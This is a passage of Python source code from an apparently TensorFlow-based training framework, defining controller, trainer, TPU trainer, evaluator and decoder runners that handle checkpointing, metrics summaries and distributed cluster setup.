self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
self._ExportMetrics(params=self.params)
self._model_analysis, self._total_num_params = _ModelAnalysis(self._model)
py_utils.LogMultiLines('MODEL ANALYSIS', self._model_analysis)
self._WriteToLog(self._model_analysis, self._control_dir,
'model_analysis.txt')
self._WriteToLog(self.params.ToText(), self._control_dir, 'params.txt')
tf.train.write_graph(self._graph.as_graph_def(), self._control_dir,
'train.pbtxt')
def Start(self):
self._RunLoop('controller', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'controller/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _Loop(self):
self._summary_writer.add_graph(self._graph)
with tf.container(self._container_id), self._GetSession() as sess:
gsteps = self._model.global_step
examples = self._model.total_examples
if FLAGS.interactive:
# Into interactive debugging mode.
_StartShell(locals())
return
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
# TODO(zhifengc): Moves these options into params.
tp = self.params.train
save_interval_seconds = tp.save_interval_seconds
summary_interval_steps = tp.summary_interval_steps
next_checkpoint_seconds = 0
next_summary_step = 1
while True:
now = time.time()
next_iteration_seconds = now + 10 # 10 seconds
# Init/restore variable if needed.
self._RestoreIfNeeded(sess)
global_step, total_examples = sess.run([gsteps, examples])
step_rate, example_rate = self._RecordStepRate(global_step,
total_examples)
if self._trial.ShouldStop() or self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
self._saver.save(sess, self._save_path, gsteps)
# Close all the queues so the enqueue threads can also finish.
for close_op in self.close_queue_ops:
sess.run(close_op)
sess.close()
return
# Checkpoint.
if now >= next_checkpoint_seconds:
tf.logging.info('Save checkpoint')
path = self._saver.save(sess, self._save_path, gsteps)
tf.logging.info('Save checkpoint done: %s', path)
next_checkpoint_seconds = now + save_interval_seconds
# Summary.
if self._summary_op is not None and global_step >= next_summary_step:
tf.logging.info('Write summary @%s', global_step)
summary_str = sess.run(self._summary_op)
if isinstance(summary_str, np.ndarray) and summary_str.size == 0:
tf.logging.info('Skipping summary: %s', summary_str)
else:
self._summary_writer.add_summary(summary_str, global_step)
self._SummarizeValue(global_step, 'total_num_params',
self._total_num_params)
next_summary_step = global_step + summary_interval_steps
tf.logging.info('Write summary done: step %d', global_step)
self._SetStatusMessage(
'step:%6d, steps/sec: %0.2f, examples/sec: %0.2f' %
(global_step, step_rate, example_rate))
self._ExportMetrics(
global_step=global_step,
step_rate=step_rate,
example_rate=example_rate)
now = time.time()
if now < next_iteration_seconds:
time.sleep(next_iteration_seconds - now)
def _RestoreIfNeeded(self, sess):
uninitialized_var_names = list(sess.run(self._uninitialized))
if not uninitialized_var_names:
return
tf.logging.info('Uninitialized var list: %s ', uninitialized_var_names)
path = tf.train.latest_checkpoint(self._train_dir)
if path:
tf.logging.info('Load from checkpoint %s.', path)
self._saver.restore(sess, path)
tf.logging.info('Load checkpoint done.')
return
if (not any(task.params.train.init_from_checkpoint_rules
for task in self._model.tasks) and
not self._params.train.init_from_checkpoint_rules):
tf.logging.info('Initialize ALL variables: %s', uninitialized_var_names)
sess.run([self._initialize_all])
tf.logging.info('Initialize variables done.')
return
# There was a race in local run. Another thread will get unblocked once
# _initialize_all is called. OverrideVarsFromCheckpoints
# might not happen at the right time.
for task in self._model.tasks:
tp = task.params.train
if tp.init_from_checkpoint_rules:
tf.logging.info('OverrideVarsFromCheckpoints %s',
tp.init_from_checkpoint_rules)
py_utils.OverrideVarsFromCheckpoints(sess, self._vars,
tp.init_from_checkpoint_rules)
if self._params.train.init_from_checkpoint_rules:
tp = self._params.train
tf.logging.info('OverrideVarsFromCheckpoints %s',
tp.init_from_checkpoint_rules)
py_utils.OverrideVarsFromCheckpoints(sess, self._vars,
tp.init_from_checkpoint_rules)
uninitialized_var_names = list(sess.run(self._uninitialized))
if not uninitialized_var_names:
return
# uninitialized_var_names is a list of strings without ":0" suffix.
assert all(isinstance(s, str) for s in uninitialized_var_names)
# Need to retrieve vars, removing ":0" suffix from names.
uninitialized_vars = [
v for v in self._vars if v.name[:-2] in uninitialized_var_names
]
tf.logging.info('Initialize variables: %s',
[v.name for v in uninitialized_vars])
sess.run(tf.variables_initializer(uninitialized_vars))
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _RecordStepRate(self, current_steps, total_examples):
"""Computes the overall step rate and adds a summary."""
self._time_steps.append((time.time(), current_steps, total_examples))
# Keeps a relative long history to compute a smooth steps/second.
# Removes duplicate stats for step = 0 to get rid of the warm-up period.
while (self._time_steps[-1][1] - self._time_steps[0][1] > 10000 or
(len(self._time_steps) > 1 and self._time_steps[-1][1] == 0 and
self._time_steps[0][1] == 0)):
del self._time_steps[0]
(t0, s0, e0), (t1, s1, e1) = self._time_steps[0], self._time_steps[-1]
rate = 0.0
example_rate = 0.0
if t1 > t0 + 1:
elapsed_secs = t1 - t0
rate = (s1 - s0) / elapsed_secs
example_rate = (e1 - e0) / elapsed_secs
tf.logging.info('Steps/second: %f, Examples/second: %f', rate, example_rate)
self._SummarizeValue(current_steps,
'%s/sec' % self._model.global_step.op.name, rate)
self._SummarizeValue(current_steps, 'examples/sec', example_rate)
return rate, example_rate
class Trainer(base_runner.BaseRunner):
"""Trainer on non-TPU."""
def __init__(self, *args, **kwargs):
super(Trainer, self).__init__(*args, **kwargs)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.cls(self.params)
self._params = self._model.params
self._model.ConstructFPropBPropGraph()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
self.close_queue_ops = tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
try:
self._task_probs_summary_writers = []
for task in self._model.task_schedule.tasks:
path = os.path.join(os.path.join(self._train_dir, task))
tf.gfile.MakeDirs(path)
self._task_probs_summary_writers.append(self._CreateSummaryWriter(path))
except AttributeError:
tf.logging.info('AttributeError. Expected for single task models.')
self._task_probs_summary_writers = []
# Saves the graph def.
if self.params.cluster.task > 0:
self._summary_writer = None
else:
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
tf.train.write_graph(self._graph.as_graph_def(), self._train_dir,
'train.pbtxt')
worker_id = self.params.cluster.task
self._start_up_delay_steps = (((worker_id + 1) * worker_id / 2) *
self.params.train.start_up_delay_steps)
def _SummarizeValue(self, steps, tag, value, writer):
if writer:
writer.add_summary(metrics.CreateScalarSummary(tag, value), steps)
def Start(self):
self._RunLoop('trainer', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
return super(Trainer, self)._LoopEnqueue(op)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
global_step = None
@py_utils.Retry(retry_value=(tf.errors.FailedPreconditionError,))
def _WaitTillInit():
"""Wait until the model is ready."""
try:
global_step = sess.run(self._model.global_step)
except tf.errors.FailedPreconditionError as e:
tf.logging.info('Probably the expected race on global_step: %s', e)
raise
msg = 'step:%6d' % global_step
self._SetStatusMessage(msg)
if global_step < self._start_up_delay_steps:
msg = 'global step (%d) has not reached start up delay steps (%d)' % (
global_step, self._start_up_delay_steps)
tf.logging.info('%s', msg)
raise tf.errors.FailedPreconditionError(
node_def=None, op=None, message=msg)
return global_step
global_step = _WaitTillInit()
status_interval_steps = 100
next_status_step = 1
eval_metrics = None
while True:
if (self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics) or
self._ShouldStop(sess, global_step)):
tf.logging.info('Training finished.')
          # Close all the queues so the enqueue threads can also finish.
for close_op in self.close_queue_ops:
sess.run(close_op)
if self._early_stop:
time.sleep(300) # controller hangs if it doesn't finish first
return
# If a task is explicitly specified, only train that task.
if self._model_task_name:
model_task = self._model.GetTask(self._model_task_name)
else:
# Note: This is a slightly stale global_step value from the previous
# sess.run() call.
# For multi-task models, `self._model.task_schedule.cur_probs` will
# be updated.
model_task = self._model.SampleTask(global_step)
if self._task_probs_summary_writers:
for index, prob in enumerate(self._model.task_schedule.cur_probs):
self._SummarizeValue(global_step, 'task_probability', prob,
self._task_probs_summary_writers[index])
try:
for index, task in enumerate(self._model.tasks):
self._SummarizeValue(global_step, 'task_weight',
sess.run(task.vars.task_weight),
self._task_probs_summary_writers[index])
except AttributeError:
pass
_, global_step, eval_metrics, per_example_tensors = sess.run([
model_task.train_op,
self._model.global_step,
model_task.eval_metrics,
model_task.per_example_tensors,
])
msg = 'step:%6d' % (global_step)
for key, (val, _) in sorted(six.iteritems(eval_metrics)):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val, self._summary_writer)
model_task.ProcessFPropResults(sess, global_step, eval_metrics,
per_example_tensors)
if global_step >= next_status_step:
self._SetStatusMessage(msg)
next_status_step = global_step + status_interval_steps
else:
tf.logging.info(msg)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
per_example_tensors)
class TrainerTpu(base_runner.BaseRunner):
"""Trainer on TPU."""
def __init__(self, *args, **kwargs):
super(TrainerTpu, self).__init__(*args, **kwargs)
# Multiple TPU trainer tasks not tested/implemented.
assert self._cluster.num_replicas == 1
data_parallelism = self._cluster.num_splits_per_client
assert data_parallelism
num_devices_per_split = self._cluster.num_devices_per_split
tf.logging.info('data_parallelism: %d, num_devices_per_split: %d',
data_parallelism, num_devices_per_split)
def ComputationShape(split_size):
"""Decides the computation shape based on the split_size."""
computation_shape = None
if split_size == 1:
computation_shape = [1, 1, 1]
elif split_size == 2:
computation_shape = [1, 1, 2]
elif split_size == 4:
computation_shape = [1, 2, 2]
elif split_size == 8:
computation_shape = [2, 2, 2]
elif split_size == 16:
computation_shape = [4, 2, 2]
else:
assert False, ('Model parallelism with %d devices is currently not'
' supported.' % split_size)
assert computation_shape is not None
return computation_shape
self._steps_per_loop = min(self.params.train.tpu_steps_per_loop,
self.params.train.max_steps)
self._initialized = threading.Event()
tf.logging.info(
'Creating TrainerTpu using data parallelism %s '
'and %s steps_per_loop', data_parallelism, self._steps_per_loop)
@py_utils.RetryOnTransientTfError()
def _WaitTillInit():
"""Wait until the model is ready."""
try:
with self._GetSession() as sess:
topology = sess.run(
tf.contrib.tpu.initialize_system(embedding_config=None, job=None))
device_assignment = tf.contrib.tpu.device_assignment(
topology,
computation_shape=ComputationShape(num_devices_per_split),
num_replicas=data_parallelism)
py_utils.SetTpuDeviceAssignment(device_assignment)
tf.logging.info('device_assignment.core_assignment: %s',
str(device_assignment.core_assignment))
tf.logging.info('device_assignment.topology.device_coordinates: %s',
str(device_assignment.topology.device_coordinates))
except py_utils.transient_tf_errors as e:
tf.logging.info('TPU initialization failed: %s', e)
raise
_WaitTillInit()
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.job_spec.name):
self._eval_metrics = metrics.TpuEvalMetrics()
def TpuTrainStep(*args):
"""Train a shard of a batch on a single TPU core.
Args:
*args: metrics values from previous steps.
Returns:
New summed metrics values and a train_op.
"""
self._model = self.params.cls(self.params)
self._model.ConstructFPropBPropGraph()
per_step_eval_metrics = self._eval_metrics.SetMetrics(
self._model.GetTask().eval_metrics, args)
outfeed_op = self._OutfeedEnqueue(
self._model.GetTask().per_example_tensors)
summed_metrics = []
assert len(per_step_eval_metrics) == len(args)
with tf.control_dependencies([outfeed_op]):
for x, y in zip(per_step_eval_metrics, args):
summed_metrics.append(x + y)
return summed_metrics + [self._model.GetTask().train_op]
def TpuTrain():
loop_result = tf.contrib.tpu.repeat(
self._steps_per_loop,
TpuTrainStep,
inputs=self._eval_metrics.initial_values,
name='train_loop')
# Final metrics are the avg across self._steps_per_loop steps.
return self._eval_metrics.FinalizeMetrics(loop_result)
batch_parallel_res = tf.contrib.tpu.batch_parallel(
TpuTrain,
num_shards=data_parallelism,
device_assignment=py_utils.GetTpuDeviceAssignment())
outfeed_dequeue_op = self._OutfeedDequeueLoop(
self._model.GetTask().per_example_tensors, self._steps_per_loop,
self._cluster.num_splits_per_client)
# Get metric result from a single replica; they are all same here.
self._tpu_train_ops = [[t[0] for t in batch_parallel_res],
outfeed_dequeue_op]
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not tf.get_collection(py_utils.CLOSE_QUEUE_OPS)
tf.logging.info('Trainer number of enqueue ops: %d',
len(self.enqueue_ops))
self._summary_writer = self._CreateSummaryWriter(self._train_dir)
# Saves the graph def.
tf.train.write_graph(self._graph.as_graph_def(), self._train_dir,
'train.pbtxt')
def _OutfeedEnqueue(self, per_example_tensors):
if not per_example_tensors:
return tf.no_op()
per_example_tensors = py_utils.NestedMap(per_example_tensors)
return tf.contrib.tpu.outfeed_enqueue_tuple(per_example_tensors.Flatten())
def _OutfeedDequeueLoop(self, per_example_tensors, num_loops, num_devices):
"""Process all per-example tensor outfeed data for a TPU sess.run.
Args:
per_example_tensors: dict of key -> tensor as generated by TpuTrainStep.
num_loops: number of times that TpuTrainStep will be executed by TpuTrain.
num_devices: number of TPU cores assigned to this process.
Returns:
A dict of per-example tensors from the latest TpuTrainStep.
"""
if not per_example_tensors:
return tf.no_op()
tensor_shapes = [
py_utils.GetShape(per_example_tensors[key])
for key in sorted(per_example_tensors)
]
tensor_types = [
tf.as_dtype(per_example_tensors[key].dtype)
for key in sorted(per_example_tensors)
]
def LoopBody(i, *input_arrays):
"""Process outfeed data for a single TpuTrainStep.
Args:
i: current loop index.
*input_arrays: One tf.TensorArray per outfeed tensor.
Returns:
i+1 (new index) plus post-write tf.TensorArray handles.
"""
# Outfeed ops execute on each JF node, so they must be located on the
# nodes.
outfeed_devices = []
device_assignment = py_utils.GetTpuDeviceAssignment()
assert device_assignment
      for replica in range(device_assignment.num_replicas):
        for core in range(device_assignment.num_cores_per_replica):
with tf.device(device_assignment.host_device(replica, core)):
outfeed_devices.append(
tf.contrib.tpu.outfeed_dequeue_tuple(
tensor_types,
tensor_shapes,
device_ordinal=device_assignment.tpu_ordinal(replica,
core)))
offset = i * num_devices
output_arrays = list(input_arrays)
# Each output_array holds a different per-example tensor. We get results
# for each tensor from each TPU for each TpuTrainStep call.
for j in range(len(output_arrays)):
for k in range(len(outfeed_devices)):
output_arrays[j] = output_arrays[j].write(offset + k,
outfeed_devices[k][j])
return tuple([i + 1] + output_arrays)
def LoopCond(i, *output_arrays):
del output_arrays
return i < num_loops
output_arrays = [
tf.TensorArray(
tensor_types[i],
size=num_loops * num_devices,
element_shape=tensor_shapes[i]) for i in range(len(tensor_shapes))
]
# Loop once for each time that TpuTrainStep runs.
output_arrays = tf.while_loop(
LoopCond, LoopBody, [0] + output_arrays, parallel_iterations=1)[1:]
concatenated_arrays = [array.concat() for array in output_arrays]
return dict(zip(sorted(per_example_tensors), concatenated_arrays))
def Start(self):
# Run training.
self._RunLoop('trainer', self._Loop)
def StartEnqueueOp(self, op):
self._RunLoop(
'trainer/enqueue_op/%s' % op.name, self._LoopEnqueue, loop_args=[op])
def _SummarizeValue(self, steps, tag, value):
self._summary_writer.add_summary(
metrics.CreateScalarSummary(tag, value), steps)
def _LoopEnqueue(self, op):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
# Wait for _Loop to initialize variables first before attempting to infeed.
self._initialized.wait()
return super(TrainerTpu, self)._LoopEnqueue(op)
def _Loop(self):
# Evaler/Controller jobs may find that the trial is infeasible and report
# done earlier. This is an important check since the trainer may retry
# indefinitely without it.
if self._trial.ShouldStop():
tf.logging.info('Training skipped (trial requested to stop).')
return
with tf.container(self._container_id), self._GetSession() as sess:
sess.run(self.initialize_tables)
sess.run(self._initialize_local_vars)
sess.run(
tf.contrib.tpu.initialize_system(embedding_config=None, job=None))
if FLAGS.run_locally == 'tpu':
sess.run(tf.global_variables_initializer())
global_step, = sess.run([self._model.global_step])
self._initialized.set()
eval_metrics = None
while True:
if self._trial.ShouldStopAndMaybeReport(global_step, eval_metrics):
          # Early terminate gracefully by setting a new max step horizon: three
          # more TPU training loops to ensure that the enqueue ops can
          # gracefully terminate as well.
if self._max_steps is None:
self._max_steps = global_step + 3 * self._steps_per_loop
tf.logging.info('Early stopping at step: %d', self._max_steps)
if self._ShouldStop(sess, global_step):
tf.logging.info('Training finished.')
return
values, outfeeds = sess.run(self._tpu_train_ops)
eval_metrics = self._eval_metrics.PackMetricsValues(values)
# Note: global_step is incremented by self._steps_per_loop by the
# previous sess.run call.
global_step, = sess.run([self._model.global_step])
msg = 'step:%6d' % (global_step)
for key, (val, _) in sorted(six.iteritems(eval_metrics)):
msg += ' %s:%.8g' % (key, val)
self._SummarizeValue(global_step, key, val)
self._SetStatusMessage(msg)
task = self._model.GetTask()
if not task.per_example_tensors:
outfeeds = {}
task.ProcessFPropResults(sess, global_step, eval_metrics, outfeeds)
self._model.ProcessFPropResults(sess, global_step, eval_metrics,
outfeeds)
class Evaler(base_runner.BaseRunner):
"""Evaler."""
def __init__(self, eval_type, *args, **kwargs):
super(Evaler, self).__init__(*args, **kwargs)
self._job_name = 'evaler_' + eval_type
self._output_name = 'eval_' + eval_type
self.params.is_eval = True
self._eval_dir = os.path.join(self._logdir, self._output_name)
if self._model_task_name:
self._eval_dir += '_' + str(self._model_task_name)
tf.gfile.MakeDirs(self._eval_dir)
self._summary_writer = self._CreateSummaryWriter(self._eval_dir)
self._should_report_metrics = self._job_name.startswith(
FLAGS.vizier_reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.cls(self.params)
self._params = self._model.params
# Always create the same graph to make sure node names are always
# exactly the same.
self._model.ConstructFPropGraph()
self._model_task = self._model.GetTask(self._model_task_name)
self._saver = self._GetSaver()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for eval models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not self.enqueue_ops
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._eval_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.train.write_graph(self._graph.as_graph_def(), self._eval_dir,
'%s.pbtxt' % self._output_name)
def Start(self):
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
"""The main loop."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = None
while True:
path = self._FindNewCheckpoint(path, sess)
if not path or self._EvalOnce(path, sess):
break
self.EvalLatestCheckpoint(path)
if self._should_report_metrics:
self._trial.ReportDone()
tf.logging.info('Evaluation finished.')
def EvalLatestCheckpoint(self, last_path=None):
"""Runs eval once on the latest checkpoint."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already evaluated.')
return
self._EvalOnce(path, sess)
def _EvalOnce(self, path, sess):
"""Runs evaluation for a batch of samples.
Args:
path: checkpoint path.
sess: the tf Session.
Returns:
should_stop.
"""
if not FLAGS.evaler_in_same_address_as_controller:
self._LoadCheckpointForEval(sess, path)
global_step = sess.run(self._model.global_step)
metrics_dict = {
name: metrics.AverageMetric() for name in self._model_task.eval_metrics
}
num_samples_metric = metrics_dict['num_samples_in_batch']
while (num_samples_metric.total_value <
self._model_task.params.eval.samples_per_summary):
# NOTE: We intentionally do not let FProp generate summaries by default,
# because evaler calls FProp multiple times for each checkpoint. Multiple
# summaries at the same step is often confusing. Instead, models should
# update eval_metrics and generate aggregate summaries.
ans = sess.run(self._model_task.eval_metrics)
for name, (value, weight) in six.iteritems(ans):
metrics_dict[name].Update(value, weight)
tf.logging.info('Total examples done: %d/%d',
num_samples_metric.total_value,
self._model_task.params.eval.samples_per_summary)
# Replace average values with total values for certain metrics.
if 'num_predictions' in metrics_dict:
metrics_dict['num_predictions'].total_weight = 1.0
if 'num_words' in metrics_dict:
metrics_dict['num_words'].total_weight = 1.0
# When we have evaluated so many samples, generate a summary.
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._eval_dir),
global_step, {k: v.Summary(k) for k, v in six.iteritems(metrics_dict)},
text_filename=os.path.join(self._eval_dir,
'score-{:08d}.txt'.format(global_step)))
should_stop = global_step >= self.params.train.max_steps
if self._should_report_metrics:
trial_should_stop = self._trial.ReportEvalMeasure(global_step,
metrics_dict, path)
should_stop = should_stop or trial_should_stop
return should_stop
def GetDecoderDir(logdir, decoder_type, model_task_name):
if model_task_name:
decoder_dir = '%s_%s' % (decoder_type, model_task_name)
else:
decoder_dir = decoder_type
return os.path.join(logdir, decoder_dir)
def _GetCheckpointIdForDecodeOut(checkpoint_path, global_step):
"""Retrieve the checkpoint id for the decoder out file.
Finds the checkpoint id in the checkpoint file name and compares to global
step. If they diverge, uses the retrieved id and prints a warning.
Args:
checkpoint_path: path to checkpoint file.
global_step: int specifying the global step of the model.
Returns:
Checkpoint id as int.
"""
ckpt_id_from_file = int(re.sub(r'.*ckpt-', '', checkpoint_path))
tf.logging.info('Loaded checkpoint is at global step: %d', global_step)
tf.logging.info('Checkpoint path: %s', checkpoint_path)
tf.logging.info('Checkpoint id according to checkpoint path: %d',
ckpt_id_from_file)
if global_step != ckpt_id_from_file:
tf.logging.warning(
'Checkpoint id %d != global step %d. '
'Will use checkpoint id from checkpoint file for '
'writing decoder output.', ckpt_id_from_file, global_step)
return ckpt_id_from_file
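# Example (illustrative): for checkpoint_path '/logdir/train/ckpt-00012345'
# and global_step 12300, the regex above yields 12345; the mismatch is logged
# as a warning and 12345 is returned.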
class Decoder(base_runner.BaseRunner):
"""Decoder."""
def __init__(self, decoder_type, *args, **kwargs):
super(Decoder, self).__init__(*args, **kwargs)
self._job_name = 'decoder_' + decoder_type
self.params.is_eval = True
self._decoder_dir = GetDecoderDir(self._logdir, self._job_name,
self._model_task_name)
tf.gfile.MakeDirs(self._decoder_dir)
self._summary_writer = self._CreateSummaryWriter(self._decoder_dir)
self._should_report_metrics = self._job_name.startswith(
FLAGS.vizier_reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.cls(self.params)
self._params = self._model.params
self._model_task = self._model.GetTask(self._model_task_name)
# Note, different graphs are being constructed for different model
# tasks, which may result in different node names being chosen.
        # Obviously, variable names have to stay the same between train and
# decode.
input_batch = (
self._model_task.input_generator.GetPreprocessedInputBatch())
self._dec_output = self._model_task.Decode(input_batch)
self._saver = self._GetSaver()
self._summary_op = tf.summary.merge_all()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for decoder models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not self.enqueue_ops
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._decoder_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.train.write_graph(self._graph.as_graph_def(), self._decoder_dir,
'%s.pbtxt' % self._job_name)
def Start(self):
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
with tf.container(
self._container_id), self._GetSession(inline=False) as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = None
while True:
path = self._FindNewCheckpoint(path, sess)
if not path or self.DecodeCheckpoint(sess, path):
break
self.DecodeLatestCheckpoint(path)
if self._should_report_metrics:
self._trial.ReportDone()
tf.logging.info('Decoding finished.')
@classmethod
def GetDecodeOutPath(cls, decoder_dir, checkpoint_id):
"""Gets the path to decode out file."""
out_dir = cls._GetTtlDir(decoder_dir, duration='7d')
return os.path.join(out_dir, 'decoder_out_%09d' % checkpoint_id)
def DecodeCheckpoint(self, sess, checkpoint_path):
"""Decodes `samples_per_summary` examples using `checkpoint_path`."""
p = self._model_task.params
samples_per_summary = p.eval.decoder_samples_per_summary
if not samples_per_summary:
samples_per_summary = p.eval.samples_per_summary
self._LoadCheckpointForEval(sess, checkpoint_path)
global_step = sess.run(self._model.global_step)
dec_metrics = self._model_task.CreateDecoderMetrics()
buffered_decode_out = []
num_examples_metric = dec_metrics['num_samples_in_batch']
start_time = time.time()
while num_examples_metric.total_value < samples_per_summary:
tf.logging.info('Fetching dec_output.')
fetch_start = time.time()
run_options = config_pb2.RunOptions(
report_tensor_allocations_upon_oom=False)
if self._summary_op is None:
# No summaries were collected.
dec_out = sess.run(self._dec_output, options=run_options)
else:
dec_out, summary = sess.run([self._dec_output, self._summary_op],
options=run_options)
self._summary_writer.add_summary(summary, global_step)
post_process_start = time.time()
tf.logging.info(
'Done fetching (%f seconds)' % (post_process_start - fetch_start))
decode_out = self._model_task.PostProcessDecodeOut(dec_out, dec_metrics)
if decode_out:
buffered_decode_out.extend(decode_out)
tf.logging.info(
'Total examples done: %d/%d '
'(%f seconds decode postprocess)', num_examples_metric.total_value,
samples_per_summary,
time.time() - post_process_start)
summaries = {k: v.Summary(k) for k, v in six.iteritems(dec_metrics)}
elapsed_secs = time.time() - start_time
example_rate = num_examples_metric.total_value / elapsed_secs
summaries['examples/sec'] = metrics.CreateScalarSummary(
'examples/sec', example_rate)
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._decoder_dir),
global_step,
summaries,
text_filename=os.path.join(self._decoder_dir,
'score-{:08d}.txt'.format(global_step)))
self._ExportMetrics(
decode_checkpoint=global_step,
dec_metrics=dec_metrics,
example_rate=example_rate)
if buffered_decode_out:
# global_step and the checkpoint id from the checkpoint file might be
# different. For consistency of checkpoint filename and decoder_out
# file, use the checkpoint id as derived from the checkpoint filename.
checkpoint_id = _GetCheckpointIdForDecodeOut(checkpoint_path, global_step)
decode_out_path = self.GetDecodeOutPath(self._decoder_dir, checkpoint_id)
self._WriteKeyValuePairs(decode_out_path, buffered_decode_out)
should_stop = global_step >= self.params.train.max_steps
if self._should_report_metrics:
trial_should_stop = self._trial.ReportEvalMeasure(
global_step, dec_metrics, checkpoint_path)
should_stop = should_stop or trial_should_stop
return should_stop
def DecodeLatestCheckpoint(self, last_path=None):
"""Runs decoder on the latest checkpoint."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already decoded.')
return
self.DecodeCheckpoint(sess, path)
class RunnerManager(object):
"""Helper class for managing runners."""
  # This is a hack so these classes can be overridden with internal
  # non-public implementations.
inference_graph_exporter = inference_graph_exporter
model_registry = model_registry
Controller = Controller
Trainer = Trainer
TrainerTpu = TrainerTpu
Evaler = Evaler
Decoder = Decoder
def __init__(self, model):
self._model_name = model
def MaybeLaunchTensorFlow(self):
"""Starts TF machinary in this process."""
if FLAGS.run_locally:
return
tf.logging.info('Launching tensorflow.')
target = FLAGS.tf_master
if not target.startswith('localhost'):
# E.g., trainer_client is configured w/ FLAGS.tf_master pointing to
# another job. In that case, start a local server.
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = {}
for job_spec in job_specs:
# ps_host=worker1:1231,worker2:1234
job_machines = job_spec.split('=')
if len(job_machines) != 2:
          raise ValueError('Invalid job specification: %s' % job_spec)
cluster_spec_dict[job_machines[0]] = job_machines[1].split(',')
self._tf_server = tf.train.Server(
tf.train.ClusterSpec(cluster_spec_dict),
job_name=FLAGS.job,
task_index=FLAGS.task)
target = self._tf_server.target
if not FLAGS.tf_master:
FLAGS.tf_master = target
with tf.Session(target).as_default():
value = (tf.constant(1.) + tf.constant(1.)).eval()
assert value == 2.0, 'Something is really wrong.'
tf.logging.info('Launched tensorflow.')
def GetParamsForDataset(self, job_name, dataset_name):
"""Returns params for job `job_name` on the dataset `dataset_name`."""
try:
cfg = self.model_registry.GetParams(self._model_name, dataset_name)
except AttributeError as e:
dataset_name_retry = dataset_name.title()
tf.logging.warning('Exception configuring dataset %s, retrying as %s: %s',
dataset_name, dataset_name_retry, e)
cfg = self.model_registry.GetParams(self._model_name, dataset_name_retry)
tf.logging.warning('Succeeded after retrying as %s.' % dataset_name_retry)
self.UpdateClusterParamsFromFlags(cfg, job_name)
return cfg
def MaybeConfigRunDistributed(self):
"""If given a `FLAGS.cluster_spec`, update flags for running distributed."""
if not FLAGS.cluster_spec:
return
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = {}
for job_spec in job_specs:
# ps_host=worker1:1231,worker2:1234
job_machines = job_spec.split('=')
if len(job_machines) != 2:
        raise ValueError('Invalid job specification: %s' % job_spec)
cluster_spec_dict[job_machines[0]] = job_machines[1].split(',')
